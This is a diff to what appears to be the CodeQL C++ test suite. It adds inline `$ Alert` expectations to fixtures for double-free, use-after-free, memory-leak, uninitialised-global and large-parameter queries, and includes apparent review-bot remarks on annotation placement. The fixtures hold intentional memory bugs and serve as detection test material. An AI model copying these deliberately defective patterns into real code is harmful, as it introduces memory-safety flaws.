a/cpp/ql/test/query-tests/Critical/GlobalUseBeforeInit/test.cpp +++ b/cpp/ql/test/query-tests/Critical/GlobalUseBeforeInit/test.cpp 
@@ -25,7 +25,7 @@ int my_printf(const char * fmt, ...) return ret; } -int f1() +int f1() // $ Alert { my_printf("%d\n", a + 2); my_printf("%d\n", b + 2); // BAD @@ -36,7 +36,7 @@ void f2() { my_printf("%d\n", b); // GOOD } -int main() +int main() // $ Alert { unsigned size = sizeof(*c); // GOOD my_printf("%d\n", b); // BAD diff --git a/cpp/ql/test/query-tests/Critical/InitialisationNotRun/InitialisationNotRun.qlref b/cpp/ql/test/query-tests/Critical/InitialisationNotRun/InitialisationNotRun.qlref index 7012169e8945..611d7f42e828 100644 --- a/cpp/ql/test/query-tests/Critical/InitialisationNotRun/InitialisationNotRun.qlref +++ b/cpp/ql/test/query-tests/Critical/InitialisationNotRun/InitialisationNotRun.qlref @@ -1 +1,2 @@ -Critical/InitialisationNotRun.ql +query: Critical/InitialisationNotRun.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/InitialisationNotRun/test.cpp b/cpp/ql/test/query-tests/Critical/InitialisationNotRun/test.cpp index ee0d070df088..3a02dc9be822 100644 --- a/cpp/ql/test/query-tests/Critical/InitialisationNotRun/test.cpp +++ b/cpp/ql/test/query-tests/Critical/InitialisationNotRun/test.cpp @@ -9,9 +9,9 @@ class GlobalStorage { char name[1000]; }; -GlobalStorage *g1; // BAD +GlobalStorage *g1; // BAD // $ Alert static GlobalStorage g2; // GOOD -static GlobalStorage *g3; // BAD +static GlobalStorage *g3; // BAD // $ Alert // static variables are initialized by compilers static int a; // GOOD static int b = 0; // GOOD diff --git a/cpp/ql/test/query-tests/Critical/LargeParameter/LargeParameter.qlref b/cpp/ql/test/query-tests/Critical/LargeParameter/LargeParameter.qlref index 6ddcc7785549..379794ff5e73 100644 --- a/cpp/ql/test/query-tests/Critical/LargeParameter/LargeParameter.qlref +++ b/cpp/ql/test/query-tests/Critical/LargeParameter/LargeParameter.qlref @@ -1 +1,2 @@ -Critical/LargeParameter.ql +query: Critical/LargeParameter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
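Review bot: In GlobalUseBeforeInit/test.cpp the new `// $ Alert` markers sit on the signatures of `f1` and `main`, while the existing `// BAD` comments stay on the `my_printf` calls inside the bodies. A reader therefore cannot tell from the file which use each alert corresponds to. Presumably the query reports at the enclosing function; if so, a trailing remark would say it, e.g. `int f1() // $ Alert // reported on the function, for the use of b below`. Both function bodies continue outside their hunks, so the uses cannot be fully checked from here.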
diff --git a/cpp/ql/test/query-tests/Critical/LargeParameter/test.cpp b/cpp/ql/test/query-tests/Critical/LargeParameter/test.cpp index bf6d3d414fc4..aeddebf3e67c 100644 --- a/cpp/ql/test/query-tests/Critical/LargeParameter/test.cpp +++ b/cpp/ql/test/query-tests/Critical/LargeParameter/test.cpp @@ -13,7 +13,7 @@ class myTemplateClass public: myTemplateClass() {} - void set(T _t) { // BAD: T can be myLargeStruct, which is large + void set(T _t) { // BAD: T can be myLargeStruct, which is large // $ Alert t = _t; } @@ -21,11 +21,11 @@ class myTemplateClass }; template -void myTemplateFunction(myTemplateClass mtc_t) // BAD: T can be myLargeStruct, which is large +void myTemplateFunction(myTemplateClass mtc_t) // BAD: T can be myLargeStruct, which is large // $ Alert { } -void myFunction1(mySmallStruct a, myLargeStruct b) // BAD: b is large +void myFunction1(mySmallStruct a, myLargeStruct b) // BAD: b is large // $ Alert { myTemplateClass mtc_a; myTemplateClass mtc_b; @@ -101,12 +101,12 @@ void myFunction4( } void myFunction5( - MyLargeClass a, // BAD - MyLargeClass b, // BAD - MyLargeClass c, // BAD - MyLargeClass d, // BAD - MyLargeClass e, // BAD - MyLargeClass f // BAD + MyLargeClass a, // BAD // $ Alert + MyLargeClass b, // BAD // $ Alert + MyLargeClass c, // BAD // $ Alert + MyLargeClass d, // BAD // $ Alert + MyLargeClass e, // BAD // $ Alert + MyLargeClass f // BAD // $ Alert ) { const MyLargeClass *mlc_ptr; @@ -158,7 +158,7 @@ struct big void myFunction7( big a, // GOOD - big b // BAD + big b // BAD // $ Alert ) { a.xs[0]++; // modifies a diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.expected b/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.expected index 9636f170e0be..290b5d8a9917 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.expected +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.expected 
@@ -1,3 +1,18 @@ +#select +| test_free.cpp:14:10:14:10 | a | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:14:10:14:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:14:10:14:10 | a | a | test_free.cpp:11:5:11:8 | call to free | call to free | +| test_free.cpp:31:27:31:27 | a | test_free.cpp:30:10:30:10 | pointer to free output argument | test_free.cpp:31:27:31:27 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:31:27:31:27 | a | a | test_free.cpp:30:5:30:8 | call to free | call to free | +| test_free.cpp:37:27:37:27 | a | test_free.cpp:35:10:35:10 | pointer to free output argument | test_free.cpp:37:27:37:27 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:37:27:37:27 | a | a | test_free.cpp:35:5:35:8 | call to free | call to free | +| test_free.cpp:46:10:46:10 | a | test_free.cpp:42:27:42:27 | pointer to free output argument | test_free.cpp:46:10:46:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:46:10:46:10 | a | a | test_free.cpp:42:22:42:25 | call to free | call to free | +| test_free.cpp:46:10:46:10 | a | test_free.cpp:44:27:44:27 | pointer to free output argument | test_free.cpp:46:10:46:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:46:10:46:10 | a | a | test_free.cpp:44:22:44:25 | call to free | call to free | +| test_free.cpp:51:10:51:10 | a | test_free.cpp:50:27:50:27 | pointer to free output argument | test_free.cpp:51:10:51:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:51:10:51:10 | a | a | test_free.cpp:50:22:50:25 | call to free | call to free | +| test_free.cpp:72:14:72:14 | a | test_free.cpp:69:10:69:10 | pointer to free output argument | test_free.cpp:72:14:72:14 | a | Memory pointed to by $@ may already have been freed by $@. 
| test_free.cpp:72:14:72:14 | a | a | test_free.cpp:69:5:69:8 | call to free | call to free | +| test_free.cpp:85:12:85:12 | a | test_free.cpp:83:12:83:12 | pointer to operator delete output argument | test_free.cpp:85:12:85:12 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:85:12:85:12 | a | a | test_free.cpp:83:5:83:13 | delete | delete | +| test_free.cpp:103:10:103:10 | a | test_free.cpp:101:10:101:10 | pointer to free output argument | test_free.cpp:103:10:103:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:103:10:103:10 | a | a | test_free.cpp:101:5:101:8 | call to free | call to free | +| test_free.cpp:129:10:129:11 | * ... | test_free.cpp:128:10:128:11 | pointer to free output argument | test_free.cpp:129:10:129:11 | * ... | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:129:10:129:11 | * ... | * ... | test_free.cpp:128:5:128:8 | call to free | call to free | +| test_free.cpp:154:10:154:10 | a | test_free.cpp:152:27:152:27 | pointer to free output argument | test_free.cpp:154:10:154:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:154:10:154:10 | a | a | test_free.cpp:152:22:152:25 | call to free | call to free | +| test_free.cpp:209:10:209:10 | a | test_free.cpp:207:10:207:10 | pointer to free output argument | test_free.cpp:209:10:209:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:209:10:209:10 | a | a | test_free.cpp:207:5:207:8 | call to free | call to free | +| test_free.cpp:302:12:302:14 | buf | test_free.cpp:301:12:301:14 | pointer to g_free output argument | test_free.cpp:302:12:302:14 | buf | Memory pointed to by $@ may already have been freed by $@. 
| test_free.cpp:302:12:302:14 | buf | buf | test_free.cpp:301:5:301:10 | call to g_free | call to g_free | +| test_free.cpp:322:12:322:12 | a | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:322:12:322:12 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:322:12:322:12 | a | a | test_free.cpp:319:9:319:16 | delete | delete | edges | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:14:10:14:10 | a | provenance | | | test_free.cpp:30:10:30:10 | pointer to free output argument | test_free.cpp:31:27:31:27 | a | provenance | | 
@@ -43,18 +58,3 @@ nodes | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | semmle.label | pointer to operator delete output argument | | test_free.cpp:322:12:322:12 | a | semmle.label | a | subpaths -#select -| test_free.cpp:14:10:14:10 | a | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:14:10:14:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:14:10:14:10 | a | a | test_free.cpp:11:5:11:8 | call to free | call to free | -| test_free.cpp:31:27:31:27 | a | test_free.cpp:30:10:30:10 | pointer to free output argument | test_free.cpp:31:27:31:27 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:31:27:31:27 | a | a | test_free.cpp:30:5:30:8 | call to free | call to free | -| test_free.cpp:37:27:37:27 | a | test_free.cpp:35:10:35:10 | pointer to free output argument | test_free.cpp:37:27:37:27 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:37:27:37:27 | a | a | test_free.cpp:35:5:35:8 | call to free | call to free | -| test_free.cpp:46:10:46:10 | a | test_free.cpp:42:27:42:27 | pointer to free output argument | test_free.cpp:46:10:46:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:46:10:46:10 | a | a | test_free.cpp:42:22:42:25 | call to free | call to free | -| test_free.cpp:46:10:46:10 | a | test_free.cpp:44:27:44:27 | pointer to free output argument | test_free.cpp:46:10:46:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:46:10:46:10 | a | a | test_free.cpp:44:22:44:25 | call to free | call to free | -| test_free.cpp:51:10:51:10 | a | test_free.cpp:50:27:50:27 | pointer to free output argument | test_free.cpp:51:10:51:10 | a | Memory pointed to by $@ may already have been freed by $@. 
| test_free.cpp:51:10:51:10 | a | a | test_free.cpp:50:22:50:25 | call to free | call to free | -| test_free.cpp:72:14:72:14 | a | test_free.cpp:69:10:69:10 | pointer to free output argument | test_free.cpp:72:14:72:14 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:72:14:72:14 | a | a | test_free.cpp:69:5:69:8 | call to free | call to free | -| test_free.cpp:85:12:85:12 | a | test_free.cpp:83:12:83:12 | pointer to operator delete output argument | test_free.cpp:85:12:85:12 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:85:12:85:12 | a | a | test_free.cpp:83:5:83:13 | delete | delete | -| test_free.cpp:103:10:103:10 | a | test_free.cpp:101:10:101:10 | pointer to free output argument | test_free.cpp:103:10:103:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:103:10:103:10 | a | a | test_free.cpp:101:5:101:8 | call to free | call to free | -| test_free.cpp:129:10:129:11 | * ... | test_free.cpp:128:10:128:11 | pointer to free output argument | test_free.cpp:129:10:129:11 | * ... | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:129:10:129:11 | * ... | * ... | test_free.cpp:128:5:128:8 | call to free | call to free | -| test_free.cpp:154:10:154:10 | a | test_free.cpp:152:27:152:27 | pointer to free output argument | test_free.cpp:154:10:154:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:154:10:154:10 | a | a | test_free.cpp:152:22:152:25 | call to free | call to free | -| test_free.cpp:209:10:209:10 | a | test_free.cpp:207:10:207:10 | pointer to free output argument | test_free.cpp:209:10:209:10 | a | Memory pointed to by $@ may already have been freed by $@. 
| test_free.cpp:209:10:209:10 | a | a | test_free.cpp:207:5:207:8 | call to free | call to free | -| test_free.cpp:302:12:302:14 | buf | test_free.cpp:301:12:301:14 | pointer to g_free output argument | test_free.cpp:302:12:302:14 | buf | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:302:12:302:14 | buf | buf | test_free.cpp:301:5:301:10 | call to g_free | call to g_free | -| test_free.cpp:322:12:322:12 | a | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:322:12:322:12 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:322:12:322:12 | a | a | test_free.cpp:319:9:319:16 | delete | delete | diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.qlref b/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.qlref index 8e68f14ce223..eab98ddcb530 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.qlref +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.qlref @@ -1 +1,2 @@ -Critical/DoubleFree.ql +query: Critical/DoubleFree.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/MemoryMayNotBeFreed.qlref b/cpp/ql/test/query-tests/Critical/MemoryFreed/MemoryMayNotBeFreed.qlref index 33da8e296e22..84fd18014db0 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/MemoryMayNotBeFreed.qlref +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/MemoryMayNotBeFreed.qlref @@ -1 +1,2 @@ -Critical/MemoryMayNotBeFreed.ql \ No newline at end of file +query: Critical/MemoryMayNotBeFreed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/MemoryNeverFreed.qlref b/cpp/ql/test/query-tests/Critical/MemoryFreed/MemoryNeverFreed.qlref index 2d1336a55ebf..108a872987d7 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/MemoryNeverFreed.qlref +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/MemoryNeverFreed.qlref 
@@ -1 +1,2 @@
-Critical/MemoryNeverFreed.ql
\ No newline at end of file
+query: Critical/MemoryNeverFreed.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.expected b/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.expected
index 891141f56f1e..153350b2a99c 100644
--- a/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.expected
+++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.expected
@@ -1,3 +1,28 @@ +#select +| test.cpp:214:2:214:2 | a | test.cpp:213:7:213:7 | pointer to free output argument | test.cpp:214:2:214:2 | a | Memory may have been previously freed by $@. | test.cpp:213:2:213:5 | call to free | call to free | +| test.cpp:220:2:220:2 | a | test.cpp:219:7:219:7 | pointer to free output argument | test.cpp:220:2:220:2 | a | Memory may have been previously freed by $@. | test.cpp:219:2:219:5 | call to free | call to free | +| test.cpp:229:4:229:8 | data1 | test.cpp:228:14:228:18 | pointer to operator delete[] output argument | test.cpp:229:4:229:8 | data1 | Memory may have been previously freed by $@. | test.cpp:228:2:228:18 | delete[] | delete[] | +| test_free.cpp:12:5:12:5 | a | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:12:5:12:5 | a | Memory may have been previously freed by $@. | test_free.cpp:11:5:11:8 | call to free | call to free | +| test_free.cpp:13:5:13:6 | * ... | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:13:5:13:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:11:5:11:8 | call to free | call to free | +| test_free.cpp:45:5:45:5 | a | test_free.cpp:42:27:42:27 | pointer to free output argument | test_free.cpp:45:5:45:5 | a | Memory may have been previously freed by $@. | test_free.cpp:42:22:42:25 | call to free | call to free | +| test_free.cpp:45:5:45:5 | a | test_free.cpp:44:27:44:27 | pointer to free output argument | test_free.cpp:45:5:45:5 | a | Memory may have been previously freed by $@. | test_free.cpp:44:22:44:25 | call to free | call to free | +| test_free.cpp:71:9:71:9 | a | test_free.cpp:69:10:69:10 | pointer to free output argument | test_free.cpp:71:9:71:9 | a | Memory may have been previously freed by $@. 
| test_free.cpp:69:5:69:8 | call to free | call to free | +| test_free.cpp:84:5:84:5 | a | test_free.cpp:83:12:83:12 | pointer to operator delete output argument | test_free.cpp:84:5:84:5 | a | Memory may have been previously freed by $@. | test_free.cpp:83:5:83:13 | delete | delete | +| test_free.cpp:91:5:91:5 | a | test_free.cpp:90:10:90:10 | pointer to free output argument | test_free.cpp:91:5:91:5 | a | Memory may have been previously freed by $@. | test_free.cpp:90:5:90:8 | call to free | call to free | +| test_free.cpp:96:9:96:9 | a | test_free.cpp:95:10:95:10 | pointer to free output argument | test_free.cpp:96:9:96:9 | a | Memory may have been previously freed by $@. | test_free.cpp:95:5:95:8 | call to free | call to free | +| test_free.cpp:102:23:102:23 | a | test_free.cpp:101:10:101:10 | pointer to free output argument | test_free.cpp:102:23:102:23 | a | Memory may have been previously freed by $@. | test_free.cpp:101:5:101:8 | call to free | call to free | +| test_free.cpp:153:5:153:5 | a | test_free.cpp:152:27:152:27 | pointer to free output argument | test_free.cpp:153:5:153:5 | a | Memory may have been previously freed by $@. | test_free.cpp:152:22:152:25 | call to free | call to free | +| test_free.cpp:236:9:236:10 | * ... | test_free.cpp:233:14:233:15 | pointer to free output argument | test_free.cpp:236:9:236:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:233:9:233:12 | call to free | call to free | +| test_free.cpp:241:9:241:10 | * ... | test_free.cpp:239:14:239:15 | pointer to free output argument | test_free.cpp:241:9:241:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:239:9:239:12 | call to free | call to free | +| test_free.cpp:246:9:246:10 | * ... | test_free.cpp:245:10:245:11 | pointer to free output argument | test_free.cpp:246:9:246:10 | * ... | Memory may have been previously freed by $@. 
| test_free.cpp:245:5:245:8 | call to free | call to free | +| test_free.cpp:278:15:278:17 | buf | test_free.cpp:277:8:277:13 | pointer to free output argument | test_free.cpp:278:15:278:17 | buf | Memory may have been previously freed by $@. | test_free.cpp:277:3:277:6 | call to free | call to free | +| test_free.cpp:283:14:283:16 | buf | test_free.cpp:282:8:282:12 | pointer to free output argument | test_free.cpp:283:14:283:16 | buf | Memory may have been previously freed by $@. | test_free.cpp:282:3:282:6 | call to free | call to free | +| test_free.cpp:295:14:295:16 | buf | test_free.cpp:293:8:293:10 | pointer to free output argument | test_free.cpp:295:14:295:16 | buf | Memory may have been previously freed by $@. | test_free.cpp:293:3:293:6 | call to free | call to free | +| test_free.cpp:321:5:321:6 | * ... | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:321:5:321:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:319:9:319:16 | delete | delete | +| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:313:16:313:16 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:313:9:313:16 | delete | delete | +| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:319:9:319:16 | delete | delete | +| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:322:12:322:12 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:322:5:322:12 | delete | delete | +| test_free.cpp:332:5:332:6 | * ... | test_free.cpp:331:12:331:12 | pointer to operator delete output argument | test_free.cpp:332:5:332:6 | * ... | Memory may have been previously freed by $@. 
| test_free.cpp:331:5:331:12 | delete | delete | edges | test.cpp:213:7:213:7 | pointer to free output argument | test.cpp:214:2:214:2 | a | provenance | | | test.cpp:219:7:219:7 | pointer to free output argument | test.cpp:220:2:220:2 | a | provenance | | 
@@ -93,28 +118,3 @@ nodes | test_free.cpp:331:12:331:12 | pointer to operator delete output argument | semmle.label | pointer to operator delete output argument | | test_free.cpp:332:5:332:6 | * ... | semmle.label | * ... | subpaths -#select -| test.cpp:214:2:214:2 | a | test.cpp:213:7:213:7 | pointer to free output argument | test.cpp:214:2:214:2 | a | Memory may have been previously freed by $@. | test.cpp:213:2:213:5 | call to free | call to free | -| test.cpp:220:2:220:2 | a | test.cpp:219:7:219:7 | pointer to free output argument | test.cpp:220:2:220:2 | a | Memory may have been previously freed by $@. | test.cpp:219:2:219:5 | call to free | call to free | -| test.cpp:229:4:229:8 | data1 | test.cpp:228:14:228:18 | pointer to operator delete[] output argument | test.cpp:229:4:229:8 | data1 | Memory may have been previously freed by $@. | test.cpp:228:2:228:18 | delete[] | delete[] | -| test_free.cpp:12:5:12:5 | a | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:12:5:12:5 | a | Memory may have been previously freed by $@. | test_free.cpp:11:5:11:8 | call to free | call to free | -| test_free.cpp:13:5:13:6 | * ... | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:13:5:13:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:11:5:11:8 | call to free | call to free | -| test_free.cpp:45:5:45:5 | a | test_free.cpp:42:27:42:27 | pointer to free output argument | test_free.cpp:45:5:45:5 | a | Memory may have been previously freed by $@. | test_free.cpp:42:22:42:25 | call to free | call to free | -| test_free.cpp:45:5:45:5 | a | test_free.cpp:44:27:44:27 | pointer to free output argument | test_free.cpp:45:5:45:5 | a | Memory may have been previously freed by $@. | test_free.cpp:44:22:44:25 | call to free | call to free | -| test_free.cpp:71:9:71:9 | a | test_free.cpp:69:10:69:10 | pointer to free output argument | test_free.cpp:71:9:71:9 | a | Memory may have been previously freed by $@. 
| test_free.cpp:69:5:69:8 | call to free | call to free | -| test_free.cpp:84:5:84:5 | a | test_free.cpp:83:12:83:12 | pointer to operator delete output argument | test_free.cpp:84:5:84:5 | a | Memory may have been previously freed by $@. | test_free.cpp:83:5:83:13 | delete | delete | -| test_free.cpp:91:5:91:5 | a | test_free.cpp:90:10:90:10 | pointer to free output argument | test_free.cpp:91:5:91:5 | a | Memory may have been previously freed by $@. | test_free.cpp:90:5:90:8 | call to free | call to free | -| test_free.cpp:96:9:96:9 | a | test_free.cpp:95:10:95:10 | pointer to free output argument | test_free.cpp:96:9:96:9 | a | Memory may have been previously freed by $@. | test_free.cpp:95:5:95:8 | call to free | call to free | -| test_free.cpp:102:23:102:23 | a | test_free.cpp:101:10:101:10 | pointer to free output argument | test_free.cpp:102:23:102:23 | a | Memory may have been previously freed by $@. | test_free.cpp:101:5:101:8 | call to free | call to free | -| test_free.cpp:153:5:153:5 | a | test_free.cpp:152:27:152:27 | pointer to free output argument | test_free.cpp:153:5:153:5 | a | Memory may have been previously freed by $@. | test_free.cpp:152:22:152:25 | call to free | call to free | -| test_free.cpp:236:9:236:10 | * ... | test_free.cpp:233:14:233:15 | pointer to free output argument | test_free.cpp:236:9:236:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:233:9:233:12 | call to free | call to free | -| test_free.cpp:241:9:241:10 | * ... | test_free.cpp:239:14:239:15 | pointer to free output argument | test_free.cpp:241:9:241:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:239:9:239:12 | call to free | call to free | -| test_free.cpp:246:9:246:10 | * ... | test_free.cpp:245:10:245:11 | pointer to free output argument | test_free.cpp:246:9:246:10 | * ... | Memory may have been previously freed by $@. 
| test_free.cpp:245:5:245:8 | call to free | call to free | -| test_free.cpp:278:15:278:17 | buf | test_free.cpp:277:8:277:13 | pointer to free output argument | test_free.cpp:278:15:278:17 | buf | Memory may have been previously freed by $@. | test_free.cpp:277:3:277:6 | call to free | call to free | -| test_free.cpp:283:14:283:16 | buf | test_free.cpp:282:8:282:12 | pointer to free output argument | test_free.cpp:283:14:283:16 | buf | Memory may have been previously freed by $@. | test_free.cpp:282:3:282:6 | call to free | call to free | -| test_free.cpp:295:14:295:16 | buf | test_free.cpp:293:8:293:10 | pointer to free output argument | test_free.cpp:295:14:295:16 | buf | Memory may have been previously freed by $@. | test_free.cpp:293:3:293:6 | call to free | call to free | -| test_free.cpp:321:5:321:6 | * ... | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:321:5:321:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:319:9:319:16 | delete | delete | -| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:313:16:313:16 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:313:9:313:16 | delete | delete | -| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:319:9:319:16 | delete | delete | -| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:322:12:322:12 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:322:5:322:12 | delete | delete | -| test_free.cpp:332:5:332:6 | * ... | test_free.cpp:331:12:331:12 | pointer to operator delete output argument | test_free.cpp:332:5:332:6 | * ... | Memory may have been previously freed by $@. 
| test_free.cpp:331:5:331:12 | delete | delete | diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.qlref b/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.qlref index e299a3055e04..096090964894 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.qlref +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.qlref @@ -1 +1,2 @@ -Critical/UseAfterFree.ql \ No newline at end of file +query: Critical/UseAfterFree.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/my_auto_ptr.cpp b/cpp/ql/test/query-tests/Critical/MemoryFreed/my_auto_ptr.cpp index e7c00bdf0048..dbd6e90bed45 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/my_auto_ptr.cpp +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/my_auto_ptr.cpp @@ -52,9 +52,9 @@ template class AutoContainer2 { public: - AutoContainer2() : v(new T) // GOOD [FALSE POSITIVE] + AutoContainer2() : v(new T) // GOOD [FALSE POSITIVE] // $ Alert[cpp/memory-never-freed] { - ns::my_auto_ptr ap(new T); // GOOD [FALSE POSITIVE] + ns::my_auto_ptr ap(new T); // GOOD [FALSE POSITIVE] // $ Alert[cpp/memory-never-freed] } ns::my_auto_ptr v; @@ -68,7 +68,7 @@ class AutoCloner AutoCloner(AutoCloner &from) : val(from.val) {}; ns::my_auto_ptr clone() { - return ns::my_auto_ptr(new AutoCloner(*this)); // GOOD [FALSE POSITIVE] + return ns::my_auto_ptr(new AutoCloner(*this)); // GOOD [FALSE POSITIVE] // $ Alert[cpp/memory-never-freed] } private: 
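Review bot: In `AutoContainer2` the two lines commented `GOOD [FALSE POSITIVE]` are annotated with a plain `$ Alert[cpp/memory-never-freed]`, which records the false positive in the same form as a wanted result. The inline-expectations syntax has a `SPURIOUS:` prefix for this case, for example `// GOOD [FALSE POSITIVE] // $ SPURIOUS: Alert[cpp/memory-never-freed]`, so the annotation itself states that the alert is unwanted. The same applies to `AutoCloner::clone()` in the next hunk and to `test_loop3` and `test_deref` in test_free.cpp. Both class bodies continue outside these hunks.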
@@ -77,9 +77,9 @@ class AutoCloner int main() { - int *i1 = new int; // BAD: never deleted - int *i2 = id(new int); // BAD: never deleted - ignore(new int); // BAD: never deleted + int *i1 = new int; // BAD: never deleted // $ Alert[cpp/memory-never-freed] + int *i2 = id(new int); // BAD: never deleted // $ Alert[cpp/memory-never-freed] + ignore(new int); // BAD: never deleted // $ Alert[cpp/memory-never-freed] ns::my_auto_ptr a1(new char); // GOOD ns::my_auto_ptr a2(new short); // GOOD diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/test.cpp b/cpp/ql/test/query-tests/Critical/MemoryFreed/test.cpp index 7f3afc95550c..7f2fd2b6101a 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/test.cpp +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/test.cpp @@ -23,7 +23,7 @@ myClass1 :: myClass1() array1 = (int *)malloc(sizeof(int) * 100); array2 = (int *)malloc(sizeof(int) * 100); array3 = (int *)malloc(sizeof(int) * 100); - array4 = (int *)malloc(sizeof(int) * 100); // never freed + array4 = (int *)malloc(sizeof(int) * 100); // never freed // $ Alert[cpp/memory-never-freed] free(array1); } @@ -39,7 +39,7 @@ void myClass1 :: method1() array5 = (int *)malloc(sizeof(int) * 100); array6 = (int *)malloc(sizeof(int) * 100); array7 = (int *)malloc(sizeof(int) * 100); - array8 = (int *)malloc(sizeof(int) * 100); // never freed + array8 = (int *)malloc(sizeof(int) * 100); // never freed // $ Alert[cpp/memory-never-freed] free(array3); free(array5); @@ -70,7 +70,7 @@ myClass2 :: myClass2() array1 = (int *)malloc(sizeof(int) * 100); array2 = (int *)malloc(sizeof(int) * 100); array3 = (int *)malloc(sizeof(int) * 100); - array4 = (int *)malloc(sizeof(int) * 100); // never freed + array4 = (int *)malloc(sizeof(int) * 100); // never freed // $ Alert[cpp/memory-never-freed] free(array1); } 
